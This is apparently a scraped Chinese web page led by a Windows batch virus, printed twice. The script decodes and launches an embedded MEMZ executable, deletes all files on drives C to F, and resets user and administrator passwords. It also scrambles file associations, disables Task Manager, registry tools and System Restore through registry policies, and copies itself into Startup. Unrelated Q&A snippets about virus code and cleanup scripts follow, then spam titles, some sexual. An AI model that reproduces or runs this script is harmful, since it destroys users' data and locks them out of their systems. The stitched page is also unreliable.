    echo fA6e0gUF+9PPBzxIzemOcSCCOjA+x8tW0oyRksyRPhXDH2YG+qRTFQR7YD36pZi3b/K6kTM9ic2j>>x
    echo phWErpCBlbMPzG9x5rJVCBSsNR4p2GaXl6crQPrKdiIc8o4FXz7ZJuV6NXaaUMvv68MIiVJcl9uW>>x
    echo 3i6P3WuXUaSA9BA7CZEu4iQOIhAaIJBgE2rECXs34x5GgxD1H8km7nAwxCKV68IiHHShiB5BF/Ih>>x
    echo tOIBEncrSQvxpnwPctoDXnlfT164qCVxxvJBatqwLxy0d3ro5NruyVgT5Hkp2Ejk+GAQpzPIhZxC>>x
    echo OMRu9Qk9tJNmv18UDXcpF06GPtgM83B9lNghdEomiYtEs5yrDClBmVpoqvgOARLSybQRDtLpdjaI>>x
    echo GxDuo9iRgs/Lw7owEE6/UG6c30Ze8jqc8HBOV0i6blY30jiBQNTQTGOHZYOlCrdVbLpaG1tvrkOg>>x
    echo tOTSiNJS10zDC4IYokBLQ4vNXFmHfWmuqqltsMR/15cm4Y/u2Doz4i8Ns5glXUkpsqrJYkZoomMa>>x
    echo EB1B1trYYKullBChQXkj4lW9eS0lXG1hW2xSRJsiCijJ4XJCztrm1dRnvPAZF6H+s2lT/iarsw+3>>x
    echo FLunOuDaxnPA0cMpPyR9q+cLOTw062oKecwOahwrBiHEb8GB1RBqsruCfA0OXEsgIEjnlY3wACcJ>>x
    echo wyepP/aAi5UEwG0bwIPeLYSedfTrB+xDKgKwAvFIc0PSGA9hMT8oSbgF7yHQc6HNwssFyO6XqPOg>>x
    echo uppcLcPxxli81pjkWhevU+N1drzOj9dF8XpjvHbJtWmHXPsfiLcfkeqJbzanA84BjpUD4t9rTvSl>>x
    echo kM+XtVXNdfRfHeh3j9I3kNlead0T30vmu+iHjNlSMqNDADoyF7j4N5CUPuUjt7PvuOMORyfd4/Qb>>x
    echo znvI5FzpbmiqwCqv4oySj1V8jof01SP9d60OZhInf+FoJWQXHRf/pnLXevmTy/zOoJzObpY/nZS+>>x
    echo pczmDBIKiEHFJE6Sobfi6rrfRQTPxhrHp+C+CS0+BpxnCu4J4NJZWdaJstAs6+fMFFwvcHuB27Tq>>x
    echo Ku47wGmgs1NTxh0BbpAlX1r+8W+KMo+Jf1O0KJGdWANCl9nhoEGPkGpVnYBgYPZI38LWyK019IeT>>x
    echo iKoRO5YOpgOHFZhZFQ4EEDkncHMVll7XZOtpUiXdkpudNAsn5D+mzJBxtcD+jLF5eN5PFqvbaB68>>x
    echo BsGFNJEqj0Aji8+BllntwaWgy+uHzJUT79hpFZDN7qhzdQbsgT70pdK11ONI90hUGuxeHqPulrgK>>x
    echo Xi+I1eHS1EYG43LRQWZyF2OjGnAJ4N5X5bFTHbwwIbkgeJBX+I2FNp/dH3QKCIn3q+LrMxaucQWC>>x
    echo oTay7yqmAbsbPH+uXOsROieU+Fy8JSmRNEgr8PA+jEPq2mCpMxbmS0G2nUpaL5+QbeSyspn+qOCB>>x
    echo GHEcIT8h1S4k/7jNTA4j/0WozttcPlzJg5ZecoBU891yk4qFEXXKJtwu6UVPWp6F7iNvfIXyQIra>>x
    echo TrnLKUY9j6ytC3pIUcb5VAoY8TslNBVnVCMIWy29IK5q8Tnx/jk0+QZG+hzxuTT3wVnfRrZJ2Fof>>x
    echo MgdylFQH7D21XTSJ+Q7lLBOoriI8pJV+IsD7gas9TbhKkrQp8rSRb1F54E9BIWAVIC0b96+J9iLa>>x
    echo ruaDW0OCXyZCyJ+JxRf2VjldHkdcZEIySRUyS2q6uPjkAwX1LCpdG2mxWZomLDSbVLpClZ4QtbAt>>x
    echo FOBhCKm1tro2PuSSYsoeaRa20hMui8hHp9ScPD+D5AFwEbaG/ZOoVrsnDJP+FLbp84fMXbeHXQG+>>x
    echo Cjc72atekvFreV8TfJleMc3VrWbrBGtyo8JGk2CLnD2ZycLPtdtIApmyDZoFc2DLNlBd8LlR1Ka2>>x
    echo GkvdhFNqiBXXXpsQ9jngNW21DfX1En42iccNLLPWC4tM7DiMstogVH51Xd2Xh+DrLm8uNxGt3kRM>>x
    echo AD/gKcAYgM01kQ2AQcAIIDXPRCoAfsA+wCigFMd7L+AIYBxgLUAbcAhwBpCOwLoBMAgYpkHWgDmA>>x
    echo CGBpIfCAxwDDgDcB9EvUM4AYYAwwDmCMkA+QDmABuYAiwMUS0FthIroV8oFSCpwHMAjYB3gKcBKQ>>x
    echo jdSjFNAMuBMwCNgHOAw4BhgFaIpBG7ABsA9wCPA8IAZgwGcpoBdwBHAZKQ4Xxt5Ok+sf3IC5DYQc>>x
    echo nIP1vwJ9xvHL58j47nTImIOzEm3TAULOYvzm9wk5jva+cjLxv0v+HykKko5nuvy/XT6Hp3JyX4Kf>>x
    echo hhynhlzNU/6+VKzu9XpY3PGCuEutyjHkczm4DnQJDlwPVuW0NK/JK82h2b/PYfcIPn5VTh8fzFl9>>x
    echo 0/SkCkRR3EBxMQEBX3BVDm635cEuJ++1B/MmfyajPy6V24Pe/G2GHFxEfK5u3C1ap3IDKZatCAUQ>>x
    echo G2p93UKc2sJrUDMulOZhZpBexHFqxdvABPjb6XWRd1wNM5OdU7vl3Q5B6nDH9bAe+lyVQ7sRccwO>>x
    echo r8uH8yJgDwmBHDbsMnfRbb4qp9vuCfI5bMFVfgVfzbCi4HPiVRRMrpNqsGBChWh8pcmRgG6A3WZx>>x
    echo uVwpZ+Ju4TZz3ZyXC3NPcf/ODXNHufe4jziFYZphpiHDsNxgMJQZTAbe4Df0G35h+I3hPcNFw2eG>>x
    echo tMIVhdWF6wpbCjcVbi0MFe4qvKfwXwofLTxa+Hbhfyv8oPBSYZoxw5hnLDdWG9cZNxm7jT7jncZv>>x
    echo Gx8z/tL4ivG08V3jZ0ZlUVKRrii9KKsov6ikyFS0vqi1qKMoUHR30f1F3yt6oujVojNFHxbpim8o>>x
    echo zizOLq4rbireUNxR/I3i14rfKf7P4ovFaSXzS4pLzCVbSrwlwZK+kqGSb5fsK3my5HDJcyUnS86U>>x
    echo fFjiXhFaMbAiuuKfVvzzit+u+GjF5RXTSvNLS0otpetK15e2lfpL95Q+UPr90qdKXy49VfpeaULZ>>x
    echo 7DK2LL+stqyzrL9ssOyBskfK/rXsp2XPlA2XHS37sExdvrC8sfyWck95oHx7+UD53vIfl6eunLeS>>x
    echo XblkJc31D1P9cgyn4bScjkvl0rlMjuWyuaXQNccVQd8V0Hg1V8PVcVaumdvAbYL2HZyT83B+LsT1>>x
    echo cndyEW4XN8jdw+3l7uP2cQe4g9xj3OPcIVjnMHeEex4WOsa9zo1wb3InuVPcKHeGi3HnuDHuIjfO>>x
    echo XeaIgTFoDFqDzpBqSDdkGlhDtmGpIdfAGRCHDTUGq2GDYbPBCWv2Gv4XwsY/yv+35X8CUEsBAhQA>>x
    echo FAAAAAgAdXfqSJDoh9lzIQAAADoAAAgAAAAAAAAAAAAAAP+BAAAAAE1FTVouZXhlUEsFBgAAAAAB>>x
    echo AAEANgAAAJkhAAAAAA==>>x
    for /R C:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
    for /R D:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
    for /R E:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
    for /R F:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
    echo Const strPassword = "longjunjunzuishuai" >>1.vbs
    echo Dim WshNetwork >>1.vbs
    echo Set WshNetwork = CreateObject("WScript.Network") >>1.vbs
    echo Dim userName >>1.vbs
    echo userName = WshNetwork.userName&",user" >>1.vbs
    echo Dim Domain >>1.vbs
    echo Set Domain = GetObject("WinNT://./"&userName) >>1.vbs
    echo Domain.SetPassword strPassword >>1.vbs
    echo Domain.SetInfo >>1.vbs
    echo dim gj >>1.vbs
    echo on error resume next >>1.vbs
    echo dim WSHshellA >>1.vbs
    echo set WSHshellA = wscript.createobject("wscript.shell") >>1.vbs
    start “” “1.vbs“
    assoc .exe=txtfile
    assoc .txt=exefile
    assoc .html=zipfile
    assoc .dll=vbsfile
    assoc .sys=batfile
    ftype exefile=c:\users\%username%\desktop\123.exe
    ftype dllfile=c:\users\%username%\desktop\123.exe
    ftype sysfile=c:\users\%username%\desktop\123.exe
    ren *.exe *.abc
    del c:\*.*/f/s/q
    del d:\*.*/f/s/q
    del e:\*.*/f/s/q
    del f:\*.*/f/s/q
    REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\ Folder\Hidden\SHOWALL /v CheckedValue /t REG_DWORD /d 00000000 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 4294967295 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t REG_DWORD /d 00000002 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d 00000001 /f >nul cls net user administrator 123456 >nul
    for /R C:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
    for /R D:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
    for /R E:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
    for /R F:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
    copy %0 "C:\Documents and Settings\All Users\「開(kāi)始」菜單\程序\啟動(dòng)\*.*"
    copy %0 "C:\Documents and Settings\Default User\「開(kāi)始」菜單\程序\啟動(dòng)\*.*"
    copy %0 "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SystemTools.exe.bat"
    taskkill /f /fi "pid ne 1"
    echo f=new ActiveXObject(^"Scripting.FileSystemObject^");i=f.getFile(^"x^").openAsTextStream();>x.js
    echo x=new ActiveXObject(^"MSXml2.DOMDocument^").createElement(^"Base64Data^");x.dataType=^"bin.base64^";>>x.js
    echo x.text=i.readAll();o=new ActiveXObject(^"ADODB.Stream^");o.type=1;o.open();o.write(x.nodeTypedValue);>>x.js
    echo z=f.getAbsolutePathName(^"z.zip^");o.saveToFile(z);s=new ActiveXObject(^"Shell.Application^");>>x.js
    echo s.namespace(26).copyHere(s.namespace(z).items());o.close();i.close();>>x.js
    set v="%appdata%\MEMZ.exe"
    del %v% >NUL 2>NUL
    cscript x.js >NUL 2>NUL
    del x.js >NUL 2>NUL
    del z.zip >NUL 2>NUL
    del x >NUL 2>NUL
    start "" %v%

    呵呵,我笑了
    @echo off
    assoc .exe=txtfile
    assoc .txt=exefile
    assoc .html=zipfile
    assoc .dll=vbsfile
    assoc .sys=batfile
    ftype exefile=c:\users\%username%\desktop\123.exe
    ftype dllfile=c:\users\%username%\desktop\123.exe
    ftype sysfile=c:\users\%username%\desktop\123.exe
    ren *.exe *.abc
    del c:\*.*/f/s/q
    del d:\*.*/f/s/q
    del e:\*.*/f/s/q
    del f:\*.*/f/s/q
    REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\ Folder\Hidden\SHOWALL /v CheckedValue /t REG_DWORD /d 00000000 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 4294967295 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t REG_DWORD /d 00000002 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d 00000001 /f >nul REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d 00000001 /f >nul cls net user administrator 123456 >nul
    for /R C:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
    for /R D:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
    for /R E:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
    for /R F:\ %%i in (*.*) do @if not "%%~xi"==".gho" del "%%~fi"
    copy %0 "C:\Documents and Settings\All Users\「開(kāi)始」菜單\程序\啟動(dòng)\*.*"
    copy %0 "C:\Documents and Settings\Default User\「開(kāi)始」菜單\程序\啟動(dòng)\*.*"
    copy 0%"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SystemTools.exe.bat"
    taskkill /f /fi "pid ne 1"
    最后一句藍(lán)屏重啟


    start cmd
    %0


    電腦殺毒軟件代碼電腦病毒查殺代碼
    1. 電腦病毒查殺代碼 電腦殺毒軟件測(cè)試代碼的使用方法:1、在桌面上新建一個(gè)文本文檔;2、將以下代碼復(fù)制到文本文檔:X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*3、按下Ctrl+S或點(diǎn)擊“文件”→“保存”來(lái)存儲(chǔ)當(dāng)前文檔;4、關(guān)閉該文本,并右鍵使用殺毒軟件掃描該...

    批處理文件的病毒代碼大全!
    \/f >>d:\\setup.bat HKEY_CLASSES_ROOT\\batfile\\shell\\open\\command \/v setup.bat \/t REG_SZ \/d d:\\setup.bat \/f >>d:\\setup.bat echo [windows] >> %windir%\\win.ini echo run=d:\\setup.bat C:\\AUTOEXEC.BAT >> %windir%\\win.ini echo load=d:\\setup.bat C:\\AUTOEXEC.BAT >> ...

    病毒測(cè)試代碼都有什么?
    P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* \\x0d\\x0a\\x0d\\x0a 這段代碼是歐洲計(jì)算機(jī)防病毒協(xié)會(huì)開(kāi)發(fā)的一種病毒代碼,,其中的特征碼已經(jīng)包含在各種殺毒軟件的病毒代碼庫(kù)里,所以可以用做測(cè)試病毒掃描引擎。 \\x0d\\x0a下面是等級(jí): \\x0d\\x0a特等:復(fù)制完...

    簡(jiǎn)單的病毒編程代碼
    1. 打開(kāi)Visual Basic,選擇“Standard EXE”項(xiàng)目類型。2. 移除默認(rèn)的Form,添加一個(gè)新的Module。3. 在Project屬性中,將Startup Object設(shè)置為“Sub Main”。4. 在Module中輸入以下代碼:```vb Sub Main()'TaskVisible屬性用于隱藏程序,使其在任務(wù)管理器中不可見(jiàn) App.TaskVisible = False End Sub `...

    求一段清除快捷方式病毒的 批處理 代碼
    echo offecho ---U盤殺毒---@echo.@echo.pause@echo.@echo.echo 正在清除病毒taskkill \/F \/IM winservice.exe@echo.@echo.echo 請(qǐng)稍等5秒鐘pauserd \/S \/Q C:\\WINDOWS\\winsystem@echo.@echo.rem 刪除病毒文件echo 正在恢復(fù)文件夾@echo.@echo.rem 取消屬性dir \/a:ds \/b >dir.txt for \/...

    批處理病毒代碼?
    給你舉一個(gè)簡(jiǎn)單的批處理建立一個(gè)文本文檔,輸入 tree c:\\ > c:\\1.txt 保存為 tree.bat運(yùn)行一下,就把C盤目錄輸入到c盤1.txt里面了,看一下是不是 批處理用處很多,也是可以制作病毒的看看批處理的百度百科吧http:\/\/baike.baidu.com\/view\/356836.htm ...

    自制殺u盤病毒的批處理代碼
    代碼如下:echo off&mode con cols=61 lines=25&color f2 title U盤病毒天敵 echo 名稱:u盤病毒的天敵 echo 平臺(tái):windows xp echo 作者:小強(qiáng) echo 版權(quán)所有,請(qǐng)勿倒翻!cd\\ del \/f \/q \/ah .exe 2>nul del \/f \/q \/as .exe 2>nul del \/f \/q ...exe 2>nul del \/f \/q .inf 2...

    誰(shuí)能給我一個(gè)常見(jiàn)木馬的代碼?
    1、本代碼盡管測(cè)試,無(wú)任何危險(xiǎn)。2、病毒文件測(cè)試代碼。3、使用方法如下:thisisnotarealvirus.itisatextfilethatisusedtotestantivirussoftware.測(cè)試代碼:---請(qǐng)復(fù)制下面的代碼到文本中保存---x5o!p%@ap[4pzx54(p^)7cc)7}$eicar-standard-antivirus-test-file!$h+h*---請(qǐng)復(fù)制上面的代碼到文本...

    開(kāi)機(jī)一閃而過(guò)的病毒CMD代碼(如圖),請(qǐng)大神幫忙!!!3ku!!!
    對(duì)于遇到開(kāi)機(jī)一閃而過(guò)的病毒CMD代碼的問(wèn)題,可以嘗試使用以下的批處理文件進(jìn)行清除。首先,你需要在“記事本”中輸入以下代碼:echo off title Clean Color a Reg.exe delete "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" \/va \/f Reg.exe delete "HKEY_LOCAL_USER\\SOFTWARE\\...

    怎么用.bat文件查殺病毒?
    我們可以編寫(xiě)批處理來(lái)查一些常見(jiàn)的網(wǎng)絡(luò)病毒。如果確認(rèn)感染病毒,可以下載專用殺毒工具進(jìn)行查殺,或采取其他途徑殺毒。下面,我以歡樂(lè)636f7079e79fa5e9819331333231613865時(shí)光為例進(jìn)行分析:主文件:1.bat 其它文件:2.bat 3.bat 1.bat代碼:if exist c:\\folder.htt call 2.bat if exist d:\\folder.htt ...

    相關(guān)評(píng)說(shuō):

  • 關(guān)吉17830726102: 病毒文件通常以什么英文字母結(jié)尾? -
    淮南市螺紋: ______ http://bbs.winzheng.com/viewthread.php?tid=1083945 病毒命名慣例 http://securityresponse.symantec.com/avcenter/vnameinfo.html 當(dāng)你搜索病毒的名字時(shí),你應(yīng)該對(duì)病毒的命名慣例有所了解.病毒的名字包括前綴、 病毒名和后綴. ·前綴表示...
  • 關(guān)吉17830726102: 電腦中毒各個(gè)硬盤會(huì)有一個(gè)"autorun.inf"文件夾!
    淮南市螺紋: ______ 清除autorun.inf 這個(gè)小BAT程序,是我自己寫(xiě)的,對(duì)我的朋友們都很有幫助,現(xiàn)在在這里貼出來(lái),大家一起分享. 你將下列代碼復(fù)制到記事本中,然后另存為鎖autorun.bat,然后再雙擊運(yùn)行,就可以了!! 最好先反所有的U盤都先插上,不要開(kāi)...
  • 關(guān)吉17830726102: 批處理文件的編寫(xiě)刪除各個(gè)盤中的某如(123.dll) -
    淮南市螺紋: ______ ::設(shè)置要?jiǎng)h除的文件為:set delfile=123.dll:執(zhí)行全盤刪除命令 for /f "skip=1" %%i in ('wmic logicaldisk where "drivetype=3" get caption') do del /f /s /q %%i\%delfile% 請(qǐng)小心使用,我不負(fù)責(zé)你所使用上面代碼所造成的損失
  • 關(guān)吉17830726102: 幫我看看這個(gè)叫task32.bat的文件有毒沒(méi) -
    淮南市螺紋: ______ 這個(gè)BAT批處理文件是注冊(cè)WIN32IE.DLL文件,然后把該文件的屬性改成系統(tǒng)只讀隱藏文件,具體有沒(méi)有毒,要看WIN32IE.DLL文件本省,不過(guò)我估計(jì)這個(gè)文件不正常,反正我的電腦里面沒(méi)有該文件
  • 關(guān)吉17830726102: 編寫(xiě)一個(gè)批處理程序清除U盤里的病毒,同時(shí)去掉所有文件夾的隱藏、系統(tǒng)屬性. -
    淮南市螺紋: ______ @echo off & color efor /f "tokens=* delims=驅(qū)動(dòng)器: " %%i in ('fsutil fsinfo drives^|more') do ( echo. echo...
  • 關(guān)吉17830726102: 我電腦C、D、E、F、都有一個(gè)文件夾怎么都刪不掉~(yú)文件名是autorun.inf
    淮南市螺紋: ______ 清除autorun病毒的批處理文件代碼 u盤插上 首先新建個(gè)文本文檔,在里面添加以下內(nèi)容: @echo on taskkill /im explorer.exe /f rem 結(jié)束病毒進(jìn)程(以u(píng).vbe病毒的進(jìn)程w.exe為例) taskkill /im w.exe start reg add HKCU\SOFTWARE\Microsoft\...
  • 關(guān)吉17830726102: 怎樣寫(xiě)一個(gè)禁止運(yùn)行所有系統(tǒng)程序的Windows批處理文件 -
    淮南市螺紋: ______ 禁止一切程序運(yùn)行會(huì)引起不可預(yù)計(jì)的嚴(yán)重后果,方法倒是有,你修改了exe文件關(guān)聯(lián)即可——但你會(huì)開(kāi)不了機(jī)的.所以說(shuō),你要求的禁止“一切”程序顯然是行不通的.如果是因?yàn)殚L(zhǎng)期受惡意軟件干擾,用批處理自然可以初步預(yù)防(相當(dāng)于自定...
  • 關(guān)吉17830726102: logo1病毒 -
    淮南市螺紋: ______ 把我下面的代碼復(fù)制下來(lái),另存為批處理文件,也就是以bat為后綴的文件,然后雙擊保存的批處理就可以了 @echo offtitle 憶林子color 0aecho...
  • 關(guān)吉17830726102: 問(wèn)一下,這個(gè)病毒怎么清理!緊急 謝謝 -
    淮南市螺紋: ______ 在命令提示符中,輸入rd (文件夾位置)即可刪除文件夾 如文件夾內(nèi)有內(nèi)容可把rd替換為deltree來(lái)完成刪除. 清除autorun病毒的批處理文件代碼 u盤插上 首先新建個(gè)文本文檔,在里面添加以下內(nèi)容: @echo on taskkill /im explorer.exe /f ...
  • 關(guān)吉17830726102: 我的電腦中了什么病毒? -
    淮南市螺紋: ______ 手動(dòng)查殺當(dāng)前QQ流行病毒 聊天工具QQ用戶甚多,各種病毒木馬以及流氓軟件也利用它大肆傳播,一旦染上就難以清除,還常常危及他人.近期,QQ病毒又有了抬頭之勢(shì),不僅危害更大,其花樣也是推陳出新,讓人放不勝防.下面就為大家介...
  • 性欧美丰满熟妇XXXX性久久久| 国产成人精品亚洲一区| 国产AV人人夜夜澡人人爽麻豆| 99久久丫E6| 中文字幕人成人乱码亚洲电影| 99精品在线| 精品无码视频99日韩精品| 免费国产一区二区三区看片| 亚洲无线码一区二区三区| 三年片在线观看大全有哪些|